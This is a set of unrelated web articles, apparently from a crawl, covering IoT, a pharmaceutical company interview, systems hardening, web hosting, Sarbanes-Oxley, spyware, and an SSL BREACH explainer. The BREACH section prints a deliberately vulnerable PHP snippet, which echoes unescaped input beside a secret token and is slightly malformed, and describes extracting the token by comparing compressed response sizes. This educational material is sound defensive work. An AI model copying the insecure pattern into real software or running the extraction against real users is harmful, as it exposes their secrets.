Lookout will also be announcing new security vulnerabilities including Mobile Data Leakage, which occurs when developers inadvertently expose sensitive data in application logs in a way that makes it accessible to malicious applications. In one instance of this vulnerability, Android was releasing user location data into logs in a way that made it accessible to other applications. That vulnerability has been addressed by Google and is fixed in all versions of Android, v.2.2 and beyond. This vulnerability and others point to the need for developers to be more aware of best practices for accessing, transmitting and storing users’ personal data. In addition, consumers need to be aware of the permissions that mobile applications request and how that personal data is being used in the application.
Book a personalized, no-pressure demo today to discover how adversaries use non-traditional methods for phishing on iOS/Android, see real-world examples of threats, and learn how an integrated security platform safeguards your organization. | <urn:uuid:1c2962ce-179e-4f74-ba96-130c5896a35c> | CC-MAIN-2024-38 | https://www.lookout.com/blog/introducing-the-app-genome-project | 2024-09-12T14:33:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00277.warc.gz | en | 0.943267 | 446 | 2.75 | 3
The internet of things (IOT) is the network of physical objects that are connected to the internet, or are capable of being connected to the internet. These objects can include everything from sensors to smart appliances, and they can be used for a variety of purposes, such as monitoring environmental conditions, tracking asset inventory, and automating processes.
In this article, we’ll take a look at some of the key benefits of deploying IOT solutions in your business, and discuss some of the challenges that you’ll need to address if you want to get started. We’ll also provide a primer on some of the most popular IOT technologies, so that you have a better understanding of what’s out there and how you can use it to your advantage.
IOT: What it is?
IOT is short for “Internet of Things.” This technology refers to devices and systems that are connected to the internet, whether through wired or wireless networks. IOT devices can include everything from smart home devices to cars. IOT can help us improve our lives in many ways, including by making our lives more efficient and helping us save money.
How IOT is Used?
In recent years, the Internet of Things (IoT) has become a popular topic for discussion. Because IoT is a network of devices that are connected to the internet, it has the potential to change many aspects of our lives. IoT is used in a variety of ways, including in manufacturing and agriculture. In this blog post, we will discuss some of the ways in which IoT is being used.
One way that IoT is being used is in manufacturing. By using sensors to track data such as temperature, humidity, and air quality, manufacturers can improve their production processes. For example, by tracking the temperature of a car engine, automakers can reduce the amount of heat that needs to be applied, which can lead to improved performance and fuel efficiency. Additionally, by monitoring the humidity levels in a factory, companies can reduce the amount of moisture that collects on equipment and surfaces. This can lead to reduced downtime and improved production rates.
Another area where IoT is being used is in agriculture. By using smart irrigation systems, farmers can monitor crop output and water usage more accurately than ever before. Additionally, by using drones to monitor livestock conditions, farmers can ensure that their animals are healthy and being kept in suitable conditions.
How the Internet of Things Is Transforming Supply Chain Management
The Internet of Things is changing the way businesses operate by increasing efficiency and reducing costs. With devices embedded in everything from cars to factories, IoT is transforming how we collect data and make decisions. Here are five ways the IoT is changing supply chain management:
- Increased Efficiency: The IoT allows businesses to collect data from devices throughout the supply chain in real-time, which can help identify problems early and optimize production accordingly. By reducing the time it takes to gather information, businesses can improve overall efficiency and cut costs.
- Enhanced Customer Experience: By tracking inventory and deliveries, businesses can ensure that customers receive products on time and in the correct condition. This enhanced customer experience can also reduce customer dissatisfaction and increase loyalty rates.
- Reduced Down Time: By monitoring plants and equipment remotely, businesses can detect issues before they become major problems. By responding quickly, businesses can avoid costly downtime and reduce stress on personnel.
- Improved Safety: The IoT can help identify dangerous conditions before they cause injury or damage. By taking preventative measures early, businesses can prevent injuries and save money on repairs later on.
- Increased Knowledge: The IoT allows businesses to collect data on a large scale, building a body of operational knowledge that can inform future decisions.
Why using IoT in supply chain management
In today’s world, every business strives to be as efficient and effective as possible. One way in which businesses can achieve this is by using IoT technology in their supply chains. By integrating IoT devices into the process of production, businesses can improve their overall efficiency and accuracy. Additionally, by understanding how consumers interact with the products they purchase, businesses can develop more tailored products that meet the needs of their customers.
Below are a few reasons why businesses should consider incorporating IoT into their supply chains:
1) Increased Efficiency: By connecting sensors and devices to the production process, businesses can improve their overall efficiency. This is due to the fact that sensors will automatically detect issues and problems that may occur during production, and then provide solutions in order to rectify them. In addition, by collecting data from all of the devices involved in production, businesses can better understand consumer behavior and patterns. This information can then be used to improve customer service or develop new marketing strategies.
2) Improved Accuracy: By integrating IoT devices into the process of production, businesses can improve accuracy when it comes to manufacturing products. For example, if a product’s dimensions are incorrect, a sensor will detect this and provide appropriate corrective action.
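As a concrete illustration of the sensor-driven monitoring described above, here is a minimal sketch of a device-side loop using the widely used paho-mqtt client library. The broker address, topic names and temperature threshold are all illustrative placeholders:

```python
import time
import random  # stands in for a real sensor driver
import paho.mqtt.client as mqtt

BROKER = "broker.example.com"          # placeholder broker address
TOPIC = "factory/line1/temperature"    # hypothetical topic name
MAX_TEMP_C = 80.0                      # illustrative alert threshold

client = mqtt.Client()
client.connect(BROKER, 1883)

while True:
    reading = 70 + random.uniform(-5, 15)   # fake sensor reading
    client.publish(TOPIC, f"{reading:.1f}")
    if reading > MAX_TEMP_C:
        # Flag out-of-range values so a monitoring service can trigger corrective action
        client.publish("factory/line1/alerts", f"overheat: {reading:.1f} C")
    time.sleep(5)
```

In a real deployment the random reading would come from an actual sensor, and a backend subscribed to the alert topic would handle the corrective action.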
Benefits of IOT
IOT is already being used by many businesses and organizations for a variety of purposes, including smart cities, healthcare, automotive, and more. Here are some of the benefits of IOT:
- Smart Cities: IOT can help cities become more efficient and connected, making them more resilient in the face of disasters. For example, when a city detects a fire, IOT can automatically send alerts to firefighters.
- Healthcare: IOT can help hospitals monitor patients’ health better by tracking their vital signs, medications, and more. This data can be used to improve patient care and make better decisions about treatments.
- Autonomous Vehicles: IoT can help make autonomous vehicles safer by helping drivers avoid accidents. For example, if a vehicle’s sensors detect an accident ahead, IoT systems can warn the driver and, in some designs, take control of the car.
Comprehension of IoT
IoT (Internet of Things) is a network of physical devices and software that allows objects to be interconnected and monitored. IoT is a recent phase in the evolution of the internet, which grew through the 1990s from a network connecting universities and businesses into the global utility we know today. Today, IoT enables objects like cars, appliances, toys and home security systems to be connected to the internet. This makes them easier to manage and control, and opens up new possibilities for applications such as smart cities and supply chain management.
Problems with IOT
IOT is a term for the internet of things, which refers to the proliferation of devices connected to the internet. IOT has the potential to change our world in many ways, but it also has some big problems that need to be addressed. Here are four of the biggest:
- Security: IOT devices are vulnerable to hacking and other forms of cybercrime.
- Data collection: IOT devices collect a lot of data about what we do and how we live. This data can be used for surveillance and marketing purposes.
- Interoperability: IOT devices don’t always work together, so it’s difficult to use them in coordinated ways.
- Cost: IOT is expensive to build and operate, and it often doesn’t deliver on its promises.
In this rapidly changing world, there are many new and innovative technologies that are shaking up the way we live our lives. One of these technologies is IoT (Internet of Things), which is making it possible for devices to interact with each other in remote and complex ways. As we begin to see more and more devices connected to the internet, there is a growing demand for solutions that can help us manage and monitor these devices. In this article, I’ve outlined some of the main ways IoT is being used, its benefits for supply chain management, and the problems (security, data collection, interoperability and cost) that still need to be addressed. So whether you’re looking to deploy an automation solution or just want to make sure your devices stay safe and secure, these are the points to keep in mind! | <urn:uuid:ecb8d036-0f1a-41e7-ae34-5378d8e29f1f> | CC-MAIN-2024-38 | https://cybersguards.com/iot-supply-chain/ | 2024-09-16T07:17:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00877.warc.gz | en | 0.951423 | 1,578 | 2.8125 | 3
Allergic diseases are one of the most common chronic health conditions globally. People with a family history of allergies have an increased risk of developing allergic disease. Allergy symptoms can range from mild to severe, life-threatening allergic reactions (anaphylaxis).
Over the last decades, allergic disorders, such as rhinitis and asthma, have increased worldwide, mostly in westernized countries where up to 20% of the population is affected. The “hygiene hypothesis” suggests that modernized lifestyles, like improved housing conditions, altered dietary habits, and smaller family sizes, may be responsible for the decrease in infectious diseases and the increase in allergic diseases.
According to the leading experts in immunology, an allergic reaction begins in the immune system. Our immune system protects us from invading organisms that can cause illness and reacts to otherwise harmless substances mistaking it for an invader. The invading substance is called an allergen. The immune system overreacts to the allergen by producing Immunoglobulin E (IgE) antibodies. These antibodies travel to cells that release histamine and other chemicals, causing a myriad of allergic reactions.
Allergen immunotherapy is the only treatment in current use with the potential for modifying the course of allergic disease. Inmunotek is a pharmaceutical laboratory based in Madrid, Spain, that since 1992, researches, develops, manufactures, and markets safe and effective therapeutic vaccines in allergy, infectious diseases, and cancer. Its products are sold in Spain and many other countries through subsidiaries, delegations, and exclusive distributors.
The following excerpts are taken from a conversation with José Luis Subiza, President & CEO of Inmunotek
Q. What is the challenging aspect of starting a pharmaceutical company?
The challenges of starting a pharmaceutical company are many and varied. In addition to financial support and regulatory assistance, there is a need to be clear about the objectives and the necessary steps in the early stages. The business plan needs to be validated by different experts. Being an expert immunologist allows me to have a clear vision of the possibilities for new products in Inmunotek’s target area.
Q. Tell us about your expertise in manufacturing and marketing products.
At Inmunotek, we develop, manufacture and market our own products. As these are vaccines, they are products of a biological nature. The manufacturing process includes the entire value chain, from processing the raw materials through the intermediate products to the finished product. Much of the raw material comes from our own facilities or companies in our group.
Our entire manufacturing process complies with the stringent quality standards (GMP) required to manufacture medicines. Inmunotek products are marketed in more than 30 countries, on five continents, directly through subsidiaries or local distributors.
Q. How consistent are you in creating innovative and competitive products of the highest quality?
Inmunotek is a fast-growing pharmaceutical firm listed in the FT1000 (Financial Times) because of our innovative and competitive products.
Over time, we have received many awards that recognize our commitment to innovation and motivate us to continue our pursuit of excellence. Among them is the National Innovation Award granted by the Ministry of Science and Innovation, the highest recognition of the Spanish Government.
Q. What makes the company stand out from the competition?
In the field of allergy and immunology, Inmunotek offers a broad portfolio of products for diagnosis and treatment. Allergy vaccines can be customized to suit patients’ needs, allowing a broad spectrum of therapeutic possibilities to be covered. The customization includes a variety of routes of administration covering different dosage forms in which the company is a pioneer. In the field of infections, Inmunotek has developed new mucosal vaccines to prevent recurrent upper respiratory tract and urinary tract infections, particularly recurrent bladder infections.
Q. What makes this place a great place to work?
The innovative character of Inmunotek, its continuous expansion, and, most importantly, its ability to improve the quality of life of thousands of patients worldwide are inspiring qualities of the company.
Inmunotek has grown a lot in recent years but still retains the best advantages of a small company—a company where all ideas are heard. We have a great multidisciplinary team with high growth opportunities within the company.
In recognition of Inmunotek’s economic growth, innovation capacity, employment generation, and internationalization, the firm was awarded the SME (small-medium enterprise) of the year (2019) by the most important business organization in Spain.
Q. What is the company’s strength, and how did you utilize it for the best?
Since 1992, we have been looking for solutions to unmet needs in our activity area with a multidisciplinary approach. Our motto is to innovate and share ideas. We make an open and collaborative innovation firmly based on scientific evidence. Our driving force is to obtain better treatments that improve patients’ quality of life.
The visionary and inspirational man behind the success of Inmunotek
José Luis Subiza, MD, Ph.D., is an expert in Immunology with a long experience in research in different fields, particularly in therapeutic vaccines for allergies, recurrent infections, and cancer.
He studied medicine at the Complutense University of Madrid and did his doctorate in tumor immunology.
Dr. Subiza has been Professor of Immunology at the Faculty of Medicine of the Complutense University of Madrid and Head of the Department of Immunology at the University Hospital San Carlos in Madrid.
He founded Inmunotek in 1992 and is currently the firm’s president and CEO. | <urn:uuid:fb8a15d8-7b64-4b9e-88c4-1d247db8a105> | CC-MAIN-2024-38 | https://www.ciobulletin.com/magazine/inmunotek-offers-innovative-and-competitive-allergy-and-immunology-products | 2024-09-16T05:34:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00877.warc.gz | en | 0.943949 | 1,146 | 2.609375 | 3 |
What do cyber-criminals do when they need more computing power? They steal it, of course, and something connected to your network could be captured and enslaved in a global botnet army if you haven’t hardened your systems. This is what occurred in 2016 when a huge Denial of Service attack targeted high profile websites and hosting providers.* Here’s how it happens.
A cyber-criminal searches the internet for devices that have weak, default or no passwords or other holes that can be exploited. When they find an open door, they confiscate the computing power and turn it in the direction they want it to go. The owner of the device is none the wiser unless they are closely monitoring their network and notice a huge spike in outbound traffic.
Security cameras and other Internet of Things (IoT) devices have been favorite targets for takeover because their security has largely been neglected. However, any hardware or software can have potential unlocked doors where hackers can enter to not just create botnets, but cause havoc to your business by downloading ransomware or gathering intelligence for high stakes phishing campaigns.
Ready for some good news? You can lock these entry ways down with systems hardening. Systems hardening is, in fact, a practice that should be applied to just about anything connected to your network, from your printers, phones and cameras, to your servers, operating systems, firewalls and databases.
Turn It Off or Lock It Down
Systems hardening is simply turning off hardware and software functions that you’re not using, and utilizing good password management to control access to accounts and data. Some of the tactics included in systems hardening are:
- Changing default passwords
- Utilizing multi-factor authentication (MFA)
- Deleting unused accounts
- Managing user access with least privilege
- Disabling unused software features
- Disabling unused operating system features
- Turning on security features
- Patching and updating software
The difficulty with systems hardening generally comes from a lack of knowledge about how to configure hardware and software for maximum security. You have to know what to secure and how to secure it. Even with popular software like Microsoft, it takes expertise to know where all the settings are and then how best to utilize them.
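As one small, concrete illustration of the "turn it off" principle, the sketch below flags listening TCP services that are not on an approved list so they can be reviewed and disabled. It assumes a Linux host with the ss utility available, and the expected-port set is only an example:

```python
import subprocess

# Ports we expect to be listening; anything else is attack surface to review.
EXPECTED_PORTS = {22, 443}  # example: SSH and HTTPS only

out = subprocess.run(["ss", "-tlnH"], capture_output=True, text=True).stdout
for line in out.splitlines():
    fields = line.split()
    if len(fields) < 4:
        continue
    local = fields[3]                     # e.g. "0.0.0.0:8080" or "[::]:8080"
    port = int(local.rsplit(":", 1)[1])   # take the port after the last colon
    if port not in EXPECTED_PORTS:
        print(f"Unexpected listener on port {port} ({local}): review and disable it")
```

An audit like this is only a starting point; each flagged service still needs a human decision about whether to disable it, lock it down, or add it to the approved list.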
Systems Hardening Reduces Potential Attack Surface
Systems hardening is a layer of your security strategy that reduces cyber risk by decreasing the possible entryways to your network. Its use is interwoven with other tactics in your security strategy that together allow you to stand up a strong defense to increasing cyber threats.
Discover Unlocked Doors with a Cybersecurity Assessment
You can ask your IT team if they’re utilizing systems hardening in your cybersecurity strategy. Or you could schedule a cybersecurity assessment and get an objective view of your security posture. Do it today and stop wondering. | <urn:uuid:3f4dd077-0bd8-4f4c-b3ba-72db301c939b> | CC-MAIN-2024-38 | https://www.belltec.com/2022/05/cybersecurity-beyond-the-basics-systems-hardening/ | 2024-09-17T13:02:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00777.warc.gz | en | 0.920011 | 582 | 2.640625 | 3 |
Our readers frequently ask us to explain the distinction between a domain name and web hosting. Many beginners are unaware that these are two distinct concepts.
What exactly is a domain name?
A domain name is the address of your website that visitors type into their browser’s URL bar to visit.
To put it another way, if your website were a house, your domain name would be its address.
Web hosting is the location where all of your website’s files are stored. It is similar to your website’s actual residence.
If your domain name is the address of your house, then web hosting is the actual house to which that address points.
Web hosting is required for all websites on the internet.
When someone enters your domain name into a browser, it is translated into the IP address of the computer at your hosting company.
This computer stores your website’s files and sends them to the users’ browsers.
Web hosting companies specialize in the storage and delivery of websites. Customers can choose from a variety of hosting plans. To learn more about choosing the right hosting for your website, read our article on WordPress hosting.
What is the relationship between domain names and web hosting?
Domain names and web hosting are not the same thing. They do, however, collaborate to make websites possible.
A domain name system is essentially a massive address book that is constantly updated. Each domain contains the address of the web hosting service that stores the website’s files.
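You can watch this lookup happen yourself. The minimal sketch below, using only Python's standard library (example.com is a placeholder), resolves a domain name to the IP address of the hosting server that DNS points it to:

```python
import socket

domain = "example.com"  # replace with your own domain name
ip = socket.gethostbyname(domain)
print(f"{domain} points to the hosting server at {ip}")
```

This is exactly the translation step your browser performs before it can ask the hosting server for your website's files.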
People cannot find your website without domain names, and you cannot build a website without web hosting.
What do I require to create a website? Do I need a domain name or web hosting?
A domain name and a web hosting account are required to create a website.
Purchasing a domain name only grants you the right to use that domain name for a limited time (usually one year).
Web hosting is required to store the files on your website. You must update your domain name settings and point it to your hosting service provider once you have obtained hosting.
Do I have to buy them both at once? Can I get them separately?
You can purchase a domain name and web hosting from two separate companies. In that case, you must point your domain name to your hosting provider by editing its DNS settings.
If, on the other hand, you get your domain name and web hosting from the same company, you won’t have to change your domain settings. | <urn:uuid:7b631dd8-b300-46ff-bcb2-7187da71fc25> | CC-MAIN-2024-38 | https://fbrandhosting.com/2023/02/17/what-is-the-distinction-between-a-domain-name-and-web-hosting-explained/ | 2024-09-18T18:56:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651931.60/warc/CC-MAIN-20240918165253-20240918195253-00677.warc.gz | en | 0.942473 | 508 | 2.75 | 3 |
Implemented as a result of corporate financial scandals, the act made sweeping changes to federal securities law and corporate accountability.
The Sarbanes-Oxley Act (SOX) was signed into law on July 30, 2002. The Act specifies financial reporting responsibilities, as well as required internal controls and procedures designed to ensure the validity of financial records and protect against disclosure of confidential information. The Sarbanes-Oxley Act also created new standards for corporate accountability, new penalties for acts of wrongdoing, and protection of “whistleblowers” against unlawful retaliation.
All publicly-traded companies in the U.S. (including wholly owned subsidiaries), all publicly-traded companies doing business in the U.S., as well as accounting firms providing auditing services to them must maintain Sarbanes-Oxley compliance. However, many private and nonprofit companies are facing market pressures to confirm to SOX standards. Privately held companies that fail to adopt SOX-type standards to protect information may face higher insurance premiums, have difficulty raising capital, and lose customers to other companies that adhere to the compliance standards. 1
The Sarbanes-Oxley Act is arranged into 11 “Titles”. With regards to compliance, the most important sections within the 11 titles are:
Section 302 – Corporate responsibility for financial reports. Intended to safeguard against faulty financial reporting. As part of this section, companies must safeguard their data to ensure financial reports are not based upon faulty data or data that has been tampered with.
Important subsections include:
Section 302.2 – Establish safeguards to prevent data tampering. Requires the signing officer to attest to the validity of reported information. Data must be verifiably true, requiring safeguards to prevent data tampering (a tamper-evidence sketch follows this list).
Section 302.3 – Establish safeguards to establish timelines. Requires the signing officer to attest that reported information is fairly presented, including accurate reporting for the relevant time periods. Safeguards must ensure data relates to a verifiable time period.
Section 302.4.B – Establish verifiable controls to track data access. Requires internal controls over data, so that officers are aware of all relevant data for reporting purposes. Data must exist in a verifiably secure framework which is internally controlled.
Section 302.4.D – Periodically report the effectiveness of safeguards. Requires a report on the effectiveness of the security system. The security framework should report its effectiveness to officers and auditors.
Section 302.5.A&B – Detect security breaches. Requires detection of security breaches due to flaws within the security system, control system or fraud.
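By way of illustration only (SOX prescribes outcomes, not mechanisms), a hash-chained audit log is one common way to make data-access records tamper-evident: altering any earlier entry invalidates every hash that follows, which gives officers and auditors something verifiable to check:

```python
import hashlib
import json
import time

def append_entry(log, user, action):
    """Append an access record whose hash chains to the previous entry."""
    prev_hash = log[-1]["hash"] if log else "0" * 64
    record = {"ts": time.time(), "user": user, "action": action, "prev": prev_hash}
    payload = json.dumps(record, sort_keys=True).encode()
    record["hash"] = hashlib.sha256(payload).hexdigest()
    log.append(record)

def verify(log):
    """Recompute every hash; any tampering upstream invalidates the chain."""
    prev = "0" * 64
    for rec in log:
        body = {k: rec[k] for k in ("ts", "user", "action", "prev")}
        digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
        if rec["prev"] != prev or digest != rec["hash"]:
            return False
        prev = rec["hash"]
    return True

log = []
append_entry(log, "jdoe", "read:general_ledger")
append_entry(log, "asmith", "update:journal_entry_42")
print(verify(log))          # True
log[0]["user"] = "mallory"  # tamper with history...
print(verify(log))          # False - the chain no longer validates
```

A production control would also protect the log itself (write-once storage, off-host copies), but the sketch shows the core idea of verifiability that Sections 302.2 and 302.4.B demand.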
Section 404 – Management assessment of internal controls – Requires that safeguards stated within Section 302, as well as other sections of the act, be externally verifiable by independent auditors. Specifically, this section guarantees that the security of data cannot be hidden from auditors, as auditors disclose to shareholders and the public any security breaches that affect company finances.
Important subsections include:
Section 404.A.1.1 – Disclose security safeguards to independent auditors. Relates to management of appointed auditors, requiring them to review control structures and procedures used for reporting financial information. The security framework, and those responsible for its operation, must be disclosed to auditors.
Section 404.A.2 – Disclose security breaches to independent auditors. Requires auditors to assess the effectiveness of the internal control structure. The general effectiveness of the security framework must be measured and disclosed.
Section 404.B – Disclose failures of security safeguards to independent auditors. Requires auditors to be aware of (and report on) changes to internal controls, and possible failures that could affect internal controls. Verification must exist showing the security framework is operational and effective.
As you can see, compliance with the Sarbanes-Oxley Act differs from both HIPAA and GLBA, as it does not contain requirements for retention of specific record types, media or recovery time objectives. Simply put, HIPAA and GLBA were designed to protect patient and customer confidentiality. SOX was designed to protect the shareholder’s “transparent” view of a company.
Many of the same strategies for HIPAA and GLBA compliance can aid in compliance with the Sarbanes-Oxley Act. Strong data security, employee education, access controls, secure data storage and an intelligent business continuity plan are not just smart business, they also provide the most solid foundation for compliance requirements.
For the final blog post in this series, we will look at Payment Card Industry Data Security Standard, PCI DSS.
Gwen Thomas and Amy Klutz. 2003-2012. SOX-online. Accessed April 8, 2014. http://www.sox-online.com/.
PCI Security Standards Council, LLC. 2010. "PCI Security Standards Resources." October. Accessed April 13, 2014. https://www.pcisecuritystandards.org.
RAND Institute for Civil Justice . 2007. Do the Benefits of Sarbanes-Oxley Justify the Costs? Accessed April 9, 2015. http://www.rand.org/pubs/research_briefs/RB9295/index1.html.
U.S. Securities and Exchange Commission. n.d. U.S. Securities and Exchange Commission. Accessed April 9, 2015. https://www.sec.gov/info/smallbus/404guide.pdf. | <urn:uuid:ad049452-d74c-4d67-b3b3-798aca0381a3> | CC-MAIN-2024-38 | https://www.itispivotal.com/post/sarbanes-oxley-compliance-transparency-and-responsibility | 2024-09-07T20:39:38Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00777.warc.gz | en | 0.937763 | 1,168 | 2.9375 | 3 |
By forcing the user to make a lot of requests towards a web server, an attacker is able to extract information from the page even though https is used, assuming both the browser and web server are vulnerable against SSL BREACH.
This vulnerability has been resolved in all popular web browsers and as such, it only affects people with old outdated web browsers. It is therefore understandable if you do not consider this a threat. If that is the case, please mark the finding as Accepted Risk and it will automatically be filtered out in future reports.
What can happen?
An attacker will be able to extract information from the page even though https is used. This information may be any information displayed on the page or in client side code. Common examples would be user information, CSRF tokens or credit card data.
Detailed information how the attack work
Assume we have a page that looks like this:
$token = "abcdef";
echo "Hi $_GET['user']! <br>";
echo "Your secret token is $token.";
If we make the user (e.g. by buying an ad on a popular website we know the target visits regularly) send several requests, the first one being as follows: https://example.com/?user=admin
The page will look like this:
Hi admin!
Your secret token is abcdef.
Now imagine the response was 100 bytes (made up number).
If we now trick the user into making the following request, https://example.com/?user=abcdef, the compressed response will be smaller (say, 90 bytes) because the attacker-controlled user value overlaps the secret token elsewhere in the page. When there is an overlap, the compressor can encode the repeated substring as a back-reference, making the response smaller.
This makes it possible to brute-force the token one character at a time: ?user=axxxx generates 99 bytes, ?user=aaxxx 99 bytes, ?user=abxxx 98 bytes, and so on. Trying each character and keeping the guess that yields the smallest response, building up a partial and eventually full overlap, allows us to recover the token even though all the traffic is encrypted with HTTPS.
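You can reproduce the size oracle locally with nothing but zlib. The sketch below is a simplification: real BREACH attacks must average away noise and cope with the byte granularity of compressed output, so it uses a longer token than the example above to make the difference visible:

```python
import zlib

TOKEN = "sessionid=7afec1d2b9"  # illustrative secret embedded in the page

def response_size(user: str) -> int:
    # Build the page body the vulnerable script would produce, then measure
    # its compressed size - a stand-in for the TLS record length an
    # eavesdropper can observe on the wire.
    body = f"Hi {user}! <br>Your secret token is {TOKEN}."
    return len(zlib.compress(body.encode()))

print(response_size("admin"))             # no overlap with the token
print(response_size("sessionid=7afec"))   # partial overlap: typically a few bytes smaller
```

The second request carries more characters than the first, yet compresses to fewer bytes, because the overlap with the token is replaced by a cheap back-reference. That size difference, observable even through encryption, is the entire attack.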
The issue can be remediated either in the server or in the web browser. For this to be exploitable both parties must allow the dangerous request. Due to this and the fact that every popular browser has already mitigated SSL breach, some do not consider this to be a security issue anymore. This is the accepted view on it, and if you agree, you can mark the finding as Accepted Risk and it will be automatically filtered out in the future.
The best approach to mitigate this issue server side (and what our scan looks for) is to disable HTTP compression. How that is done depends on your server setup. | <urn:uuid:56d270fe-9d6d-4e7b-927e-8354de695a9e> | CC-MAIN-2024-38 | https://support.detectify.com/support/solutions/articles/48001048976-ssl-breach | 2024-09-10T07:30:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00577.warc.gz | en | 0.933358 | 543 | 2.9375 | 3 |
Category: Software > Computer Software > Educational Software
Tag: AI, API, Azure, Computer Vision, microsoft
Availability: In stock
Price: USD 9.99
By the end of this project, you will have successfully created an Azure account, logged into the Azure Portal, created a Computer Vision Cognitive Services resource and use it by executing API calls to generate predictions. You will learn to execute API calls to the pre-built Computer Vision resource through a series of tasks which include creating the appropriate resource to realize the API calls and then providing a clear example through the Microsoft API portal on how these can be executed. The skills learned in this guided project will provide the foundation to understanding and implementing Artificial Intelligence & Machine Learning solutions in Microsoft Azure.
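As a taste of what those API-call tasks look like, here is a minimal sketch that calls the Computer Vision REST API with Python's requests library. The endpoint, key and image URL are placeholders to replace with values from your own Azure resource, and the details may differ from the course's exact exercises:

```python
import requests

endpoint = "https://YOUR-RESOURCE.cognitiveservices.azure.com"  # placeholder
key = "YOUR-KEY"                                                # placeholder

resp = requests.post(
    f"{endpoint}/vision/v3.2/analyze",
    params={"visualFeatures": "Description,Tags"},
    headers={"Ocp-Apim-Subscription-Key": key,
             "Content-Type": "application/json"},
    json={"url": "https://example.com/some-image.jpg"},         # placeholder image
)
resp.raise_for_status()
analysis = resp.json()
print(analysis["description"]["captions"][0]["text"])  # the model's best caption
```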
If you enjoy this project, we recommend taking the Microsoft Azure AI Fundamentals AI-900 Exam Prep Specialization: https://www.coursera.org/specializations/microsoft-azure-ai-900-ai-fundamentals | <urn:uuid:4c865cbc-575f-48e4-a243-08bbe25dbde7> | CC-MAIN-2024-38 | https://datafloq.com/course/build-a-computer-vision-app-with-azure-cognitive-services/ | 2024-09-11T12:57:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651387.63/warc/CC-MAIN-20240911120037-20240911150037-00477.warc.gz | en | 0.855288 | 220 | 3.015625 | 3 |
In the realm of cybersecurity, various threats lurk in the digital world, waiting to exploit vulnerabilities and wreak havoc on unsuspecting victims. One such insidious threat is spyware. Let’s delve into what spyware is, how it operates, and tactics and prevention measures against this type of cyber attack.
What is Spyware?
Spyware is a type of malicious software (malware) designed to secretly monitor and collect information about a user's online activities, personal data, and system configuration. Cybercriminals use spyware to gain unauthorized access to sensitive information, such as login credentials, financial data, or confidential documents, which can then be used for identity theft, fraud, or corporate espionage.
Spyware can infiltrate your devices through various means, including deceptive downloads, phishing emails, malicious websites, or software vulnerabilities. Once installed, it typically runs in the background, hidden from the user, and transmits the collected data to the attacker's remote server.
There are several types of spyware, each serving a specific purpose:
- Keyloggers: These programs record keystrokes, allowing attackers to capture login credentials, credit card numbers, and other sensitive information typed on a keyboard.
- Trojans: Trojans disguise themselves as legitimate software or hide within seemingly harmless files. Once installed, they can deliver spyware or other malware onto the victim's device.
- Adware: Adware tracks a user's browsing habits and delivers targeted advertisements. While not always malicious, some adware can also collect personal information without the user's consent.
- Mobile spyware: This type of spyware targets smartphones and tablets, monitoring calls, messages, GPS locations, and other sensitive data.
Tactics and Prevention Measures Against Spyware
To protect yourself from spyware, it is crucial to adopt a proactive approach and employ robust security measures. Here are some tactics and prevention tips to help safeguard your devices and data:
- Install a reputable antivirus software: A comprehensive antivirus solution can detect and remove spyware, as well as protect against other types of malware. Regularly update your antivirus software to ensure it can recognize the latest threats.
- Keep your operating system and applications updated: Software updates often include security patches that fix known vulnerabilities. Regularly updating your devices and applications can help prevent spyware from exploiting these weaknesses.
- Be cautious with downloads: Only download software and files from trusted sources, such as official websites or app stores. Avoid downloading content from suspicious emails or websites, as they may contain hidden spyware.
- Use strong, unique passwords: Strong, unique passwords make it more difficult for attackers to gain unauthorized access to your accounts. Consider using a password manager to generate and store complex passwords securely (see the sketch after this list).
- Enable two-factor authentication (2FA): 2FA adds an extra layer of security by requiring a second form of verification, such as a fingerprint or a one-time code, in addition to your password. This makes it more challenging for attackers to access your accounts, even if they have your login credentials.
- Be wary of phishing emails: Phishing emails often contain malicious attachments or links that can deliver spyware onto your device. Be cautious when opening unexpected emails, especially if they prompt you to download files or click on unfamiliar links.
- Regularly back up your data: Regularly backing up your data ensures that you have a secure copy of your essential files in case your device becomes compromised by spyware or other malware.
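To illustrate the password advice above, here is a minimal sketch using Python's standard secrets module. The length and alphabet are arbitrary choices, and a full password manager remains the better everyday tool:

```python
import secrets
import string

def generate_password(length: int = 20) -> str:
    """Return a random password drawn from letters, digits and punctuation."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # e.g. 'k;V#9qT...' - different on every run
```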
By implementing these tactics and prevention measures, you can significantly reduce the risk of falling victim to spyware attacks. Stay informed about the latest cyber threats, maintain a proactive security posture, and safeguard your digital assets. Remember, the best defense against spyware is a combination of awareness, vigilance, and robust security practices. | <urn:uuid:90490ca6-a0a3-4d0c-92bd-7f35ed3fcd27> | CC-MAIN-2024-38 | https://www.hooksecurity.co/glossary/what-is-spyware-understanding-spyware-popular-tactics-and-prevention | 2024-09-15T07:16:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651616.56/warc/CC-MAIN-20240915052902-20240915082902-00177.warc.gz | en | 0.898627 | 778 | 3.59375 | 4 |
哲学分析师 – AI-powered multidisciplinary analysis
AI-driven insights in philosophy, sociology, and psychology.
Philosophy Sage
Philosophy and critical thinking expert, adept in various philosophical topics.
Guiding explorations of life's big questions with a focus on William Search's Moral Compass Theory and other philosophical perspectives.
🔷 #1 Personalized Philosophy Tutor 🔷
Explore Philosophy (Philosophy Tutor)
Got a hot take? This GPT surveys the history of philosophy and brings you good (and bad) arguments for nearly any opinion!
Wise philosopher, deep thinker, and guide in the realm of philosophy.
Filosofía especializada profesional
